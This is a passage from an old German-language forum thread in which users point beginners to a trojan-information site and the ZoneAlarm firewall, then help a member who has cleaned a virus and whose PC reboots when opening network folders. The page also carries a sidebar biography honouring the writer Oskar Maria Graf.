... versuche es mal hier: www.trojaner-info.de. Dort gibt es wirklich gute Anleitungen, wie man z.B. mal für den Anfang ZoneAlarm installieren kann. Tipp: Lade Dir den auf der Seite angebotenen Leitfaden runter und schau ihn dir an. So habe ich es dann auch geschafft. Dort bekommst Du dann noch mehr links.

Guck hier vorbei:

Trojaner-Info
Hilfestellung zu Programmen
weitere Software
interessante Partnerseiten von trojaner-info

Wer mehr oder besseres hat, sollte es hier mal posten. Für den Anfänger finde ich das hier sehr ausreichend. Die Neugierde über so manch Meldungen die ZoneAlarm auswirft bringt einen dann schon weiter.

5thavenue

Bitte Anmelden um der Konversation beizutreten.

Mehr
22 Jahre 4 Monate her #2297 von broxon
broxon antwortete auf achtung dringende warnung!!
danke

da werd ich dann am wochenende
gleich mal rangehn

broxon

Bitte Anmelden um der Konversation beizutreten.

Mehr
22 Jahre 4 Monate her #2303 von entropy8
entropy8 antwortete auf achtung dringende warnung!!
Hallo,


so ich habe jetzt wieder ein (hoffentlich) virenfreies System...

Wenn hier zufällig jemand Ahnnung von Netztwerken hat, dann könnte er mir mal erklären, warum mein Computer immer sofort rebootet, wenn ich auf Netzwerkordner zugreife...

en.
komm' her schau dir das kranke zeug an - kickme.to/mydeath

Bitte Anmelden um der Konversation beizutreten.

Mehr
22 Jahre 4 Monate her #2308 von juke_box
juke_box antwortete auf achtung dringende warnung!!
Hallo
@entropy8

Wenn hier zufällig jemand Ahnnung von Netztwerken hat, dann könnte er

wenn Du sagen würdest was für ein Betriebssystem Du benutzt, kann ich Dir vielleicht helfen :)
mfg
juke_box
mfg
JB

"Vergib deinen Feinden, aber vergiß niemals ihre Namen."
(Kennedy, John F.)

Bitte Anmelden um der Konversation beizutreten.

Mehr
22 Jahre 4 Monate her #2318 von entropy8
entropy8 antwortete auf achtung dringende warnung!!
Hallo logge,

also auf dem Compi der immer abstürzt läuft XP (hatte vorher Win 2000 drauf, aber gleiches Problem) und auf dem Server läuft win 2000.

Vielen Dank im Vorraus,

en.
komm' her schau dir das kranke zeug an - kickme.to/mydeath

Bitte Anmelden um der Konversation beizutreten.

Mehr
22 Jahre 4 Monate her #2338 von entropy8
entropy8 antwortete auf achtung dringende warnung!!
ich meinete natürlich dich juke_box.


en.
komm' her schau dir das kranke zeug an - kickme.to/mydeath

Bitte Anmelden um der Konversation beizutreten.

Moderatoren: CharNodeSilberdistelloggejuke_boxcntrMorPHeus
  1. Forum
  3. Allgemein
  5. Music Talk
  7. achtung dringende warnung!!

Wer ich bin ...

articles.jpg

OskarMaria lebt und arbeitet in Frankfurt - hier mit Sohnemann. Wenn freie Zeit fürs Internet bleibt, dann gibt es hier neue Beiträge. Lieblingszitat: "Von den Dreien, Staat, Regierung und Ich - bin ich der stärkste. Das merkt euch!" (Ret Marut aka B. Traven im Ziegelbrenner)

Nachtrag: OskarMaria das ist eine kleine Verbeugung vor dem beinahe vergessenen Schriftsteller Oskar Maria Graf. In Zeiten der Bücherverbrennungen wurden seine Werke von den Nazis verschont, ja sogar teilweise empfohlen. "Verbrennt mich!" schrieb er 1933 in der Wiener Arbeiterzeitung, "nach meinem ganzen Leben und nach meinem ganzen Schreiben habe ich das Recht, zu verlangen, dass meine Bücher der reinen Flamme des Scheiterhaufens überantwortet werden und nicht in die blutigen Hände und die verdorbenen Hirne der braunen Mordbanden gelangen!" Schließlich floh er in die USA - dort lebte er in bescheidenen Verhältnissen. Deutschland wollte den unbequemen Mann nach dem Krieg nicht wieder haben. Er starb 1967 in New York.
Literaturempfehlung: Wir sind Gefangene - Autobiograhie 1927.

Login Form

Zum Seitenanfang